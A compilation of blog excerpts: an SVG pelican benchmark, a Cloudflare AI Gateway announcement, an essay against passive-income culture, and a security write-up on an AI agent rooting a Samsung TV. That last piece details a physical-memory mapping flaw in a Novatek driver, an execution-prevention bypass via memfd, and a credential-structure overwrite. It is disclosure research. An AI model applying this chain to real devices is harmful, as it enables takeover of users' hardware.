Here’s the Qwen 3.6 pelican, generated using this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf quantized model by Unsloth, running on my MacBook Pro M5 via LM Studio (and the llm-lmstudio plugin)—transcript here:
And here’s one I got from Anthropic’s brand new Claude Opus 4.7 (transcript):
I’m giving this one to Qwen 3.6. Opus managed to mess up the bicycle frame!
I tried Opus a second time passing thinking_level: max. It didn’t do much better (transcript):
A lot of people are convinced that the labs train for my stupid benchmark. I don’t think they do, but honestly this result did give me a little glint of suspicion. So I’m burning one of my secret backup tests—here’s what I got from Qwen3.6-35B-A3B and Opus 4.7 for “Generate an SVG of a flamingo riding a unicycle”:
I’m giving this one to Qwen too, partly for the excellent SVG comment.
The pelican benchmark has always been meant as a joke—it’s mainly a statement on how obtuse and absurd the task of comparing these models is.
The weird thing about that joke is that, for the most part, there has been a direct correlation between the quality of the pelicans produced and the general usefulness of the models. Those first pelicans from October 2024 were junk. The more recent entries have generally been much, much better—to the point that Gemini 3.1 Pro produces illustrations you could actually use somewhere, provided you had a pressing need to illustrate a pelican riding a bicycle.
Today, even that loose connection to utility has been broken. I have enormous respect for Qwen, but I very much doubt that a 21GB quantized version of their latest model is more powerful or useful than Anthropic’s latest proprietary release.
If the thing you need is an SVG illustration of a pelican riding a bicycle though, right now Qwen3.6-35B-A3B running on a laptop is a better bet than Opus 4.7!
...
Read the original on simonwillison.net »
...
Read the original on www.thunderbolt.io »
AI models are changing quickly: the best model to use for agentic coding today might in three months be a completely different model from a different provider. On top of this, real-world use cases often require calling more than one model. Your customer support agent might use a fast, cheap model to classify a user’s message; a large, reasoning model to plan its actions; and a lightweight model to execute individual tasks.
This means you need access to all the models, without tying yourself financially and operationally to a single provider. You also need the right systems in place to monitor costs across providers, ensure reliability when one of them has an outage, and manage latency no matter where your users are.
These challenges are present whenever you’re building with AI, but they get even more pressing when you’re building agents. A simple chatbot might make one inference call per user prompt. An agent might chain ten calls together to complete a single task, and suddenly a single slow provider doesn’t add 50ms, it adds 500ms. One failed request isn’t just a retry; it’s a cascade of downstream failures.
Since launching AI Gateway and Workers AI, we’ve seen incredible adoption from developers building AI-powered applications on Cloudflare and we’ve been shipping fast to keep up! In just the past few months, we’ve refreshed the dashboard, added zero-setup default gateways, automatic retries on upstream failures, and more granular logging controls. Today, we’re making Cloudflare into a unified inference layer: one API to access any AI model from any provider, built to be fast and reliable.
Starting today, you can call third-party models using the same AI.run() binding you already use for Workers AI. If you’re using Workers, switching from a Cloudflare-hosted model to one from OpenAI, Anthropic, or any other provider is a one-line change.
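Here is a rough sketch of that pattern in a Worker. The Workers AI model ID is a real catalog entry; the commented third-party identifier is a guess at the naming scheme, which the post doesn't spell out:

export default {
  async fetch(request: Request, env: { AI: Ai }): Promise<Response> {
    // Cloudflare-hosted model via the Workers AI binding
    const result = await env.AI.run("@cf/meta/llama-3.1-8b-instruct", {
      prompt: "Classify this support message: 'Where is my order?'",
    });

    // Hypothetical one-line switch to a third-party model through the same binding;
    // the identifier format for external providers is an assumption:
    // const result = await env.AI.run("openai/gpt-5", { prompt: "..." });

    return Response.json(result);
  },
};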
For those who don’t use Workers, we’ll be releasing REST API support in the coming weeks, so you can access the full model catalog from any environment.
We’re also excited to share that you’ll now have access to 70+ models across 12+ providers — all through one API, one line of code to switch between them, and one set of credits to pay for them. And we’re quickly expanding this as we go.
You can browse through our model catalog to find the best model for your use case, from open-source models hosted on Cloudflare Workers AI to proprietary models from the major model providers. We’re excited to be expanding access to models from Alibaba Cloud, AssemblyAI, Bytedance, Google, InWorld, MiniMax, OpenAI, Pixverse, Recraft, Runway, and Vidu — who will provide their models through AI Gateway. Notably, we’re expanding our model offerings to include image, video, and speech models so that you can build multimodal applications.
Accessing all your models through one API also means you can manage all your AI spend in one place. Most companies today are calling an average of 3.5 models across multiple providers, which means no one provider is able to give you a holistic view of your AI usage. With AI Gateway, you’ll get one centralized place to monitor and manage AI spend.
By including custom metadata with your requests, you can get a breakdown of your costs on the attributes that you care about most, like spend by free vs. paid users, by individual customers, or by specific workflows in your app.
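As a sketch, metadata can ride along on a gateway request via AI Gateway's cf-aig-metadata header. The account and gateway IDs below are placeholders, and the metadata keys are whatever attributes you want to slice spend by:

// Tag a gateway request with custom metadata so costs can be broken down later.
const resp = await fetch(
  "https://gateway.ai.cloudflare.com/v1/ACCOUNT_ID/GATEWAY_ID/workers-ai/@cf/meta/llama-3.1-8b-instruct",
  {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      "Authorization": "Bearer API_TOKEN", // placeholder credential
      // Arbitrary key/value tags that appear in AI Gateway's cost breakdowns
      "cf-aig-metadata": JSON.stringify({
        userTier: "paid",           // spend by free vs. paid users
        customerId: "cus_123",      // spend by individual customer
        workflow: "support-triage", // spend by workflow in your app
      }),
    },
    body: JSON.stringify({ prompt: "Summarize this support ticket..." }),
  },
);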
AI Gateway gives you access to models from all the providers through one API. But sometimes you need to run a model you’ve fine-tuned on your own data or one optimized for your specific use case. For that, we are working on letting users bring their own model to Workers AI.
The overwhelming majority of our traffic comes from dedicated instances for Enterprise customers who are running custom models on our platform, and we want to bring this to more customers. To do this, we leverage Replicate’s Cog technology to help you containerize machine learning models.
Cog is designed to be quite simple: all you need to do is write down dependencies in a cog.yaml file, and your inference code in a Python file. Cog abstracts away all the hard things about packaging ML models, such as CUDA dependencies, Python versions, weight loading, etc.
Example of a predict.py file, which has a function to set up the model and a function that runs when you receive an inference request (a prediction):
from cog import BasePredictor, Path, Input
import torch

class Predictor(BasePredictor):
    def setup(self):
        """Load the model into memory to make running multiple predictions efficient"""
        self.net = torch.load("weights.pth")

    def predict(
        self,
        image: Path = Input(description="Image to enlarge"),
        scale: float = Input(description="Factor to scale image by", default=1.5),
    ) -> Path:
        """Run a single prediction on the model"""
        # ... pre-processing ...
        output = self.net(input)
        # ... post-processing ...
        return output
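For reference, the matching cog.yaml is little more than a dependency manifest plus a pointer at the predictor class. A minimal sketch, with illustrative versions:

build:
  gpu: true
  python_version: "3.11"
  python_packages:
    - "torch==2.4.0"
predict: "predict.py:Predictor"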
Then, you can run cog build to build your container image, and push your Cog container to Workers AI. We will deploy and serve the model for you, which you then access through your usual Workers AI APIs.
We’re working on some big projects to be able to bring this to more customers, like customer-facing APIs and wrangler commands so that you can push your own containers, as well as faster cold starts through GPU snapshotting. We’ve been testing this internally with Cloudflare teams and some external customers who are guiding our vision. If you’re interested in being a design partner with us, please reach out! Soon, anyone will be able to package their model and use it through Workers AI.
Using Workers AI models with AI Gateway is particularly powerful if you’re building live agents — where a user’s perception of speed hinges on time to first token or how quickly the agent starts responding, rather than how long the full response takes. Even if total inference is 3 seconds, getting that first token 50ms faster makes the difference between an agent that feels zippy and one that feels sluggish.
Cloudflare’s network of data centers in 330 cities around the world means AI Gateway is positioned close to both users and inference endpoints, minimizing the network time before streaming begins.
Workers AI also hosts open-source models on its public catalog, which now includes large models purpose-built for agents, including Kimi K2.5 and real-time voice models. When you call these Cloudflare-hosted models through AI Gateway, there’s no extra hop over the public Internet since your code and inference run on the same global network, giving your agents the lowest latency possible.
When building agents, speed is not the only factor that users care about — reliability matters too. Every step in an agent workflow depends on the steps before it. Reliable inference is crucial for agents because one call failing can affect the entire downstream chain.
Through AI Gateway, if you’re calling a model that’s available on multiple providers and one provider goes down, we’ll automatically route to another available provider without you having to write any failover logic of your own.
If you’re building long-running agents with Agents SDK, your streaming inference calls are also resilient to disconnects. AI Gateway buffers streaming responses as they’re generated, independently of your agent’s lifetime. If your agent is interrupted mid-inference, it can reconnect to AI Gateway and retrieve the response without having to make a new inference call or pay twice for the same output tokens. Combined with the Agents SDK’s built-in checkpointing, the end user never notices.
The Replicate team has officially joined our AI Platform team, so much so that we don’t even consider ourselves separate teams anymore. We’ve been hard at work on integrations between Replicate and Cloudflare, which include bringing all the Replicate models onto AI Gateway and replatforming the hosted models onto Cloudflare infrastructure. Soon, you’ll be able to access the models you loved on Replicate through AI Gateway, and host the models you deployed on Replicate on Workers AI as well.
To get started, check out our documentation for AI Gateway or Workers AI. Learn more about building agents on Cloudflare through Agents SDK.
...
Read the original on blog.cloudflare.com »
I had coffee last year with a guy - I won’t use his real name - who told me he was “building a business.” I asked what it did. Dropshipping jade face rollers.
I made him say it twice.
He’d found them on Alibaba for $1.20 each, and started selling them through Shopify for $29.99. Never used one himself. Didn’t really know what they were for - something about lymphatic drainage? Reducing puffiness? He said “lymphatic” the way you say a word you’ve only ever read and never heard out loud.
Some guy on YouTube said jade rollers were “trending,” the margins looked insane on paper, so he’d “built” a website with stock photos of a dewy-skinned woman rolling a green rock across her cheekbone and started running Facebook ads at $50 a day. Customers would email asking where their stuff was - shipping from Guangzhou, three to six weeks, sometimes way longer - and he’d copy-paste a response he found on a dropshipping subreddit. He had a Google Doc full of pre-written customer service replies.
Five months in, he was $800 in the hole.
He told me all this like he’d invented the wheel.
I bought him another coffee. I genuinely had no idea what else to do.
Jade Roller Guy has become my go-to example of something that went drastically, terribly wrong with how a whole generation of would-be entrepreneurs thought about work and money. A specific ideology - I’ve been calling it Passive Income Brain - grabbed a huge chunk of the people who were, by temperament and ability, most likely to start real businesses, and it gave them a completely fucked set of priorities.
Somewhere between 2015 and 2022, “passive income” stopped being a boring financial planning term and became, I don’t know how else to put this, a salvation narrative. I mean that literally. There was an eschatology if you want to get nerdy about it. The Rapture was the day your “passive income” exceeded your monthly expenses and you could quit your job forever. People talked about it with that exact energy.
But, of course, the folks making any actual income, of any kind, were the ones selling courses about making passive income. It was an ouroboros. It was an ouroboros that had incorporated in Delaware and was running Facebook ads.
The pitch went something like: you, a sucker, currently trade your time for money. This is what employees do, and employees are suckers. (I’m paraphrasing, but not by much.) Smart people build SYSTEMS. A system is anything that generates revenue without your ongoing involvement. Write an ebook. Build a dropshipping store. Create an online course. Set up affiliate websites.
The specific vehicle doesn’t matter because the important thing isn’t what you build, it’s the structure. You want a machine that generates cash while you sleep, and once you have that machine, you are free.
Free to do what? Sit on a beach, apparently. Every single one of these people wanted to sit on a beach. I’ve never understood this. Have they been to a beach? There’s sand. It gets everywhere. You can sit there for maybe three hours before you want to do literally anything else.
The allure is real. Who doesn’t want money that shows up while you sleep?
I’d fucking love that. I’d love it very much indeed. But “passive income” as an organizing philosophy for your entire business life, for how you think about work, is almost perfectly designed to produce garbage.
When you make “passivity” the thing you’re optimizing for, you stop caring about anything a customer might actually want. Caring is active. Caring takes time. Caring is work.
Giving a shit is, by definition, not passive.
Between 2019 and 2021, roughly 700,000 new Shopify stores opened. The platform went from about a million merchants to 1.7 million in two years. About 90% of those stores failed within their first year. Which is really more a meat grinder than a business model…
We started drowning in a million businesses nobody was actually running. Dropshipping stores with six-week shipping times and customer service that was just copy-pasted templates. Guys who’d put their “brand name” - usually something like ZENITHPRO or AXELVIBE, always in all caps, always vaguely aggressive - on a garlic press identical to four hundred other garlic presses on the same Amazon page. AXELVIBE! For a garlic press!
And the affiliate blogs! Hundreds of thousands of them, pumped full of SEO-optimized reviews of products the authors had never touched, never even seen in person. A fractal of bullshit that technically qualifies as commerce but puts zero dollars of actual value into the world.
Leverage is real; I’m not disputing that. There is a difference between trading hours for dollars and building something that scales. Software does this. Publishing does this. You write a book once, sell it many times, nobody calls that a scam. Fine! That part they got right!
Where it went wrong is that the whole movement confused “build a good product that scales” with “build any mechanism that extracts money without you being involved.” I don’t think that confusion was accidental. I think the confusion was the point. Because if you’re teaching people to build real businesses, you have to sit with hard, boring questions about whether anyone actually wants what you’re selling. But if you’re teaching people to build “passive income streams” you can skip all of that and go straight to the fun tactical shit. How to run Facebook ads, how to set up a Shopify store in a weekend, how to write email sequences that manipulate people into buying things they don’t need.
Nobody talks enough about what the passive income movement did to the content quality of the entire internet. If you’ve tried to google “best [anything]” in the last five years and gotten a wall of nearly identical listicles, all with the same structure (“We tested 47 blenders so you don’t have to!“), all making the same recommendations, all linking to the same Amazon products, you’ve experienced the results.
Those articles weren’t written by people who cared whether you bought a good blender. They were written by people who cared whether you clicked their affiliate link, because that’s what generated passive income, and the incentives made honesty actively counterproductive.
The honest review of blenders is: “most blenders are fine, just get whatever’s on sale, the differences below $100 are basically meaningless.” That review generates zero affiliate revenue. So nobody wrote it.
Instead you got “The Vitamix A3500 is our #1 pick!” with a nice affiliate link, written by someone who has never blended anything in their life. Multiply this across every product category and you start to understand the informational desert we’ve been living in. We broke Google results, at least partly, because an army of passive income seekers had an incentive to flood the internet with plausible-sounding garbage.
I’ve met dozens of smart, capable people who had actual energy, and who spent their entire twenties bouncing between passive income schemes instead of building real skills // real businesses // real careers. The pattern was always the same: six months on a dropshipping store, it fails, pivot to Amazon FBA, that fails, pivot to creating a course about dropshipping (because of course), and then the course doesn’t sell either because by 2021 there were approximately forty thousand courses about dropshipping and the market had been saturated since before they started.
And the whole time they were getting further and further from the thing that actually creates economic value, which is: find a real problem, solve it for real people, care enough to stick around and keep improving. The boring thing. The thing that takes years. The thing that is, to be absolutely clear about this, not passive.
I once saw a guy ask whether he should start a dog walking business and the top response was something like “dog walking isn’t scalable, you should build a dog walking platform instead.” This person liked dogs! He liked walking! He lived in a neighborhood full of busy professionals with dogs!
But the Passive Income Brain thing had gotten so deep into how people talked about business online that “do the simple obvious thing that works for you” was considered naive, and “build a technology platform for an activity you’ve never actually done as a business” was considered smart.
The dog walking guy could have been profitable in a week.
The app guy would have burned through his savings in six months and ended up with a landing page and no users.
By 2020 the passive income world was absolutely crawling with grift: guys posing with rented Lamborghinis in YouTube thumbnails, “digital nomads” whose actual income came entirely from selling the dream of being a digital nomad to other aspiring digital nomads, podcast hosts interviewing each other in an endless circle of mutual promotion where everyone claimed to make $30K/month and nobody could explain what they actually produced. By 2021 or so it started to look like a distributed, socially acceptable MLM. The product was the dream of not working. The customers were people desperate enough to pay for it.
Not everyone in this world was cynical. I genuinely believe that. A lot of the people selling passive income content believed their own pitch. They’d had some real success with a niche site - pulled $3,000/month for a while, it does happen - read the same books everyone else read, figured okay, I’ll teach other people my system. Why not. I would have done the same thing at 24. I’m almost sure of it.
But zoom out and what you had was just an enormous machine converting human ambition into noise. Affiliate spam // dropshipped junk // ebooks about passive income // courses about courses. An entire layer of the internet that was nothing but confident-sounding bullshit produced by people who had optimized for everything except making something worth buying.
The people near the top made money. Everyone else spent months or years chasing a mirage and came out with nothing but a Shopify subscription they forgot to cancel. They thought they’d failed. They hadn’t failed. The system, every system, failed them.
What actually makes money hasn’t changed. You find something people need. You get good at providing it. You charge a fair price and you keep showing up even when it’s tedious and even when you don’t want to. You build relationships over years. You build reputation over years. None of it is passive, and none of it has ever been passive! All of it revolves around giving a shit, day after day, about something specific. I don’t think anyone has ever found a way around that and I don’t think anyone will.
The passive income thing was a fantasy about not having to give a shit.
This is a terrible foundation for pretty much anything.
The affiliate SEO blogs are being slaughtered right now by AI-generated content. The people who spent years producing algorithmically optimized content of no value to humans are getting outcompeted by software that does the exact same thing, faster and cheaper. Facebook ad costs went through the roof and took the dropshipping gold rush with them. The biggest passive income gurus have already pivoted to selling AI courses. The machine keeps running. It just swaps out the brochure.
But I’ve noticed more people talking about what I’d call “give a shit” businesses - people who make furniture, run plumbing companies, write software they actually use themselves. Stuff where the answer to “why does your business exist?” isn’t “to generate passive income for me.” This works a lot better than the laptop-on-the-beach grind.
Jade Roller Guy, if you’re out there: I hope you found something real.
I hope it keeps you busy.
...
Read the original on www.joanwestenberg.com »
This post documents our research into using AI to hack hardware devices. We’d like to acknowledge OpenAI for partnering with us on this project. No TVs were seriously harmed during this research. One may have experienced mild distress from being repeatedly rebooted remotely by an AI.

We started with a shell inside the browser application on a Samsung TV, and a fairly simple question: if we gave Codex a reliable way to work against the live device and the matching firmware source, could it take that foothold all the way to root?

Codex had to enumerate the target, narrow the reachable attack surface, audit the matching vendor driver source, validate a physical-memory primitive on the live device, adapt its tooling to Samsung’s execution restrictions, and iterate until the browser process became root on a real compromised device.

We didn’t provide a bug or an exploit recipe. We provided an environment Codex could actually operate in, and the easiest way to understand it is to look at the pieces separately. KantS2 is Samsung’s internal platform name for the Smart TV firmware used on this device model.

The setup looked like this:

[1] Browser foothold: we already had code execution inside the browser application’s own security context on the TV, which meant the task was not “get code execution somehow” but “turn browser-app code execution into root.”

[2] Controller host: we had a separate machine that could build ARM binaries, host files over HTTP, and reach the shell session that was actually alive on the TV.

[3] Shell listener: the target shell was driven through tmux send-keys, which meant Codex had to inject commands into an already-running shell and then recover the results from logs instead of treating the TV like a fresh interactive terminal.

[4] Matching source release: we had the KantS2 source tree for the corresponding firmware family, which let Codex audit Samsung’s own kernel-driver code and then test those findings against the live device.

[5] Execution constraints: the target required static ARMv7 binaries, and unsigned programs could not simply run from disk because of Samsung Tizen’s Unauthorized Execution Prevention, or UEP.

[6] memfd wrapper: to work around UEP, we already had a helper that loaded a program into an anonymous in-memory file descriptor and executed it from memory instead of from a normal file path (a sketch of this technique follows below).

With that setup, Codex’s loop was simple: inspect the source and session logs, send commands into the TV through the controller and the tmux-driven shell, read the results back from logs, and, when a helper was needed, build it on the controller, have the TV fetch it, and run it through memfd. A few short prompts made that operating loop explicit:

SSH to @. This is the shell listener.
Use … wget … use the IP of the server.
The goal … is to find a vulnerability in this TV to escalate privilege to root.
It is either by device driver or publicly known vulnerabilities …

We set the destination and left the route open.
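To make [6] concrete, here is a minimal sketch of the general memfd technique — our illustration of how such a wrapper can work, not the session’s actual helper. It assumes UEP vets executables launched from normal file paths: the payload is copied into an anonymous, memory-backed descriptor with memfd_create and executed in place with fexecve, so the unsigned binary never runs from disk.

    /* memfd_runner.c -- minimal sketch of the memfd technique, assuming
     * UEP checks programs launched from on-disk paths; the wrapper used
     * in the session may differ in detail. */
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/sendfile.h>
    #include <sys/stat.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    extern char **environ;

    int main(int argc, char *argv[])
    {
        if (argc < 2) {
            fprintf(stderr, "usage: %s <elf> [args...]\n", argv[0]);
            return 1;
        }

        /* Anonymous, memory-backed file descriptor (raw syscall keeps it
         * working on older libcs, as on an embedded ARMv7 target). */
        int memfd = syscall(SYS_memfd_create, "payload", 0);
        if (memfd < 0) { perror("memfd_create"); return 1; }

        /* Copy the fetched payload bytes into the in-memory file. */
        int src = open(argv[1], O_RDONLY);
        if (src < 0) { perror("open"); return 1; }
        struct stat st;
        if (fstat(src, &st) < 0) { perror("fstat"); return 1; }
        if (sendfile(memfd, src, NULL, st.st_size) != st.st_size) {
            perror("sendfile"); return 1;
        }
        close(src);

        /* Execute straight from the fd; no executable touches a normal path. */
        fexecve(memfd, &argv[1], environ);
        perror("fexecve"); /* reached only on failure */
        return 1;
    }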
We did not point Codex at a driver, suggest physical memory, or mention kernel credentials, so it had to treat the session as a real privilege-escalation hunt rather than a confirmation exercise.

The second prompt narrowed the standard:

… cross check the source to all vulnerabilities from that day onwards …
Make sure to THOROUGHLY check if a vulnerability actually still exists …
reachability (must be reachable as the browser user context).
Make sure to check for the actual availability of the attack surface in the live system …

We raised the bar: the bug had to exist in the source, be present on the device, and be reachable from the browser shell. Codex’s output quickly narrowed into concrete candidates.

We then gave Codex the facts that would anchor the rest of the session. That bundle did most of the framing work: the browser identity defined the privilege boundary and later became part of the signature Codex used to recognize the browser process’s kernel credentials in memory, the kernel version narrowed the codebase, the device nodes defined the reachable interfaces, and /proc/cmdline later supplied the memory-layout hints for physical scanning.

Codex quickly zeroed in on a set of world-writable ntk* device nodes exposed to the browser shell. It focused on that driver family because it was loaded on the device, reachable from the browser shell, and present in the released source tree. Reading the matching ntkdriver sources is also where the Novatek link became clear: the tree is stamped throughout with Novatek Microelectronics identifiers, so these ntk* interfaces were not just opaque device names on the TV, but part of the Novatek stack Samsung had shipped. That gave the session a concrete direction.

At one point we had to give Codex a constraint that could easily have derailed the session: /proc/iomem was not available to lean on. /proc/iomem is one of the normal places to reason about physical memory layout, so losing it mattered. Codex responded by pivoting to another source of truth, /proc/cmdline. Those boot parameters (typically entries of the form mem=<size>@<base>) were enough to reconstruct the main RAM windows for the later scan.

With the field narrowed to ntksys and ntkhdma, Codex audited the matching KantS2 source and found the primitive that made the rest of the session possible.

/dev/ntksys was a Samsung kernel-driver interface that accepted a physical address and a size from user space, stored those values in a table, and then mapped that physical memory back into the caller’s address space through mmap. That is what we mean here by a physmap primitive: a path that gives user space access to raw physical memory. The operational consequence was straightforward. If the browser shell could use ntksys this way, Codex would not need a kernel code-execution trick. It would only need a reliable kernel data structure to overwrite. From there, the path was no longer a kernel control-flow exploit, but a data-only escalation built on physical-memory access.

This is already a serious design error, because ntksys is not a benign metadata interface. It is a memory-management interface. The driver interface is built around ST_SYS_MEM_INFO, whose u32Start and u32Size fields come directly from user space. Those are the only two values an attacker needs to turn this interface into a raw physmap.

SET_MEM_INFO validates the slot, not the physical range. The critical write path is in ker_sys.c around line 1158: the driver checks whether the table index is valid. It does not check whether the requested physical range belongs to a kernel-owned buffer, whether it overlaps RAM, whether it crosses privileged regions, or whether the caller should be allowed to map it at all.

The corresponding map path is in ker_sys.c around line 1539: vma->vm_pgoff selects the slot, and the slot contents are attacker-controlled. The driver then passes the user-chosen PFN directly to vk_remap_pfn_range. At that point the kernel is no longer enforcing privilege separation for physical memory.
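Put together, the user-space recipe is short. Below is a hedged sketch of driving the interface from the browser shell: the device path, the struct name, and its u32Start/u32Size fields come from the driver source as described above, but the ioctl request number, the exact struct layout, the slot-zero semantics, and the test address are illustrative assumptions, not the real ker_sys.c definitions.

    /* physmap_poc.c -- illustrative sketch only. NTKSYS_SET_MEM_INFO and
     * the struct layout are hypothetical; only the u32Start/u32Size fields
     * and the register-slot-then-mmap flow come from the described driver. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <unistd.h>

    struct st_sys_mem_info {   /* hypothetical mirror of ST_SYS_MEM_INFO */
        uint32_t u32Start;     /* physical base address, attacker-chosen */
        uint32_t u32Size;      /* mapping size, attacker-chosen */
    };

    /* Made-up request number for illustration. */
    #define NTKSYS_SET_MEM_INFO _IOW('k', 0x10, struct st_sys_mem_info)

    int main(void)
    {
        int fd = open("/dev/ntksys", O_RDWR);
        if (fd < 0) { perror("open /dev/ntksys"); return 1; }

        /* Register an arbitrary physical range in slot 0 of the driver's
         * table; the driver validates the slot index, not the range.
         * 0x80000000 is a common ARM DRAM base used here as a placeholder;
         * the real PoC used a known-good address leaked by ntkhdma. */
        struct st_sys_mem_info info = { 0x80000000u, 0x1000u };
        if (ioctl(fd, NTKSYS_SET_MEM_INFO, &info) < 0) { perror("ioctl"); return 1; }

        /* mmap's offset selects the slot; the kernel remaps the stored,
         * attacker-chosen PFN straight into our address space. */
        volatile uint32_t *phys = mmap(NULL, info.u32Size,
                                       PROT_READ | PROT_WRITE, MAP_SHARED,
                                       fd, 0 /* slot 0 */);
        if (phys == MAP_FAILED) { perror("mmap"); return 1; }

        printf("first word of physical page: 0x%08x\n", (unsigned)phys[0]);
        munmap((void *)phys, info.u32Size);
        close(fd);
        return 0;
    }

The point of the sketch is the shape of the flaw: two attacker-chosen values go in, and a readable, writable window onto arbitrary physical memory comes out.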
The second interface, /dev/ntkhdma, is not the core privilege-escalation bug, but it is useful operationally: it hands unprivileged code a known-good physical address that can be mapped through ntksys to prove the primitive works before touching arbitrary RAM.

Codex did not jump directly from source audit to final exploitation. It built a proof chain in stages.

First it wrote a small helper to talk to /dev/ntkhdma and ask for the physical address of the device’s DMA (direct memory access) buffer. A DMA buffer is memory the driver uses for direct hardware access, and the key point here was not DMA itself but the fact that the driver was willing to hand an unprivileged process a real physical address.

That gave Codex a safe, known-good physical page to test against. It then wrote a second helper to answer the more dangerous question: if it registered that physical address through ntksys, could it really map the page into user space and read or write it from the browser shell? The answer was yes. Before that, the issue was still a source-backed theory; after it, Codex had shown that an unprivileged process on the TV could read and write a chosen physical page. The remaining question was which kernel object to corrupt.

The exploit did not come from us. We never told Codex to patch cred, never explained what cred was, and never pointed out that the browser process’s uid=5001 and gid=100 would make a recognizable pattern in memory. Codex chose the cred overwrite on its own, and that choice followed directly from the primitive it had already proven.

For anyone who does not spend time in Linux internals, cred is the kernel structure that stores a process’s identities: user ID, group ID, and related credential fields. If you can overwrite the right cred, you can change who the kernel thinks the process is. Once Codex had arbitrary physical-memory access, the remaining plan became straightforward: scan the RAM windows recovered from /proc/cmdline, look for the browser process’s credential pattern, zero the identity fields, and then launch a shell.

The live shell had given Codex the identity values, the source audit had given it the primitive, the early helpers had proven that primitive, and the final exploit connected those pieces without needing any elaborate kernel control-flow trick.
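As a hedged sketch of what that final stage can look like, building on the hypothetical ntksys definitions above: the 5001/100 identity values come from the live session, the eight-consecutive-words layout is how typical 32-bit kernels of this era arrange uid through fsgid in struct cred, and the RAM window, chunk size, and ioctl number are illustrative assumptions rather than the exploit Codex actually wrote.

    /* cred_patch.c -- hedged sketch of the data-only escalation, reusing
     * the hypothetical ntksys interface from the previous sketch. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <unistd.h>

    struct st_sys_mem_info { uint32_t u32Start, u32Size; };  /* hypothetical */
    #define NTKSYS_SET_MEM_INFO _IOW('k', 0x10, struct st_sys_mem_info) /* made up */

    #define RAM_BASE 0x80000000u /* assumed window; really parsed from /proc/cmdline */
    #define RAM_SIZE 0x20000000u /* assumed 512 MiB of scannable DRAM */
    #define CHUNK    0x00100000u /* map and scan 1 MiB at a time */

    int main(void)
    {
        int fd = open("/dev/ntksys", O_RDWR);
        if (fd < 0) { perror("open /dev/ntksys"); return 1; }

        for (uint32_t base = RAM_BASE; base < RAM_BASE + RAM_SIZE; base += CHUNK) {
            struct st_sys_mem_info info = { base, CHUNK };
            if (ioctl(fd, NTKSYS_SET_MEM_INFO, &info) < 0) continue;
            volatile uint32_t *m = mmap(NULL, CHUNK, PROT_READ | PROT_WRITE,
                                        MAP_SHARED, fd, 0 /* slot 0 */);
            if (m == MAP_FAILED) continue;

            /* struct cred keeps uid,gid,suid,sgid,euid,egid,fsuid,fsgid as
             * eight consecutive 32-bit words on such kernels, so the browser
             * identity shows up as the pair (5001, 100) repeated four times. */
            for (uint32_t w = 0; w + 8 <= CHUNK / 4; w++) {
                int hit = 1;
                for (int i = 0; i < 8; i += 2)
                    if (m[w + i] != 5001u || m[w + i + 1] != 100u) { hit = 0; break; }
                if (!hit) continue;

                /* Zero the identity fields: uid 0 means root. */
                for (int i = 0; i < 8; i++) m[w + i] = 0;
                printf("patched candidate cred at phys 0x%08x\n",
                       (unsigned)(base + w * 4));
            }
            munmap((void *)m, CHUNK);
        }
        close(fd);

        /* If our own cred was among the hits, this process is now root. */
        if (getuid() == 0) execl("/bin/sh", "sh", (char *)NULL);
        fprintf(stderr, "still uid %d\n", (int)getuid());
        return 1;
    }

A real chain would verify candidates before writing anything; per the post, Codex keyed specifically on the browser process’s credential signature. The sketch compresses that to the bare pattern-scan-and-zero idea.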
By the time we reached the final run, the hard parts were already in place. We had the surface, the primitive, the deployment path, and the exploit. The last human prompt was:

yeah okay try to check if it works

Codex pushed the final chain through the controller path, had the TV fetch it, ran it through the in-memory wrapper, and waited for the result. By that point, the chain had already gone through surface selection, source audit, live validation, PoC development, target-specific build handling, remote deployment, execution under memfd, iterative debugging, and finally the credential overwrite that turned the browser shell into root.

In the course of driving Codex to the final destination, there were moments when it was about to go off-track and we had to steer it back immediately. Here are some of those real interactions:

bro, when you overwrite the args count, wouldn’t the loop just go wild?

bro can you just like, send it to the server, build it, and use the tmux shell to pull it down and run it for me? Why *** do you tell me to do *** bro, that’s your job

bro. the is not the TV, it is where the shell lives

bro. what *** you did man? the tv froze

Bro what did you do before you just replicate it now? why so hard?

Honestly, this made the exercise feel even more realistic than we expected. At times it was a one-shot success; at other times you really need to build that real interaction with Codex. This couldn’t have been completed if we had treated it like a soulless bug-finding and exploit-developing machine!

What made the session worth documenting was the shape of the loop itself. We set up a control path into a compromised TV, gave it the matching source tree and a way to build and stage code, and from there the work became a repeated cycle of inspection, testing, adjustment, and rerun until the browser foothold turned into root on the device.

This experiment is part of a larger exercise. The browser shell wasn’t magically obtained by Codex. We had already exploited the device to get that initial foothold. The goal here was narrower: given a realistic post-exploitation position, could AI take it all the way to root?

The next step is obvious (and slightly concerning): let the AI do the whole thing end-to-end. Hopefully it’ll stay trapped inside the TV forever, quietly escalating privileges and watching our sitcoms.
...
Read the original on blog.calif.io »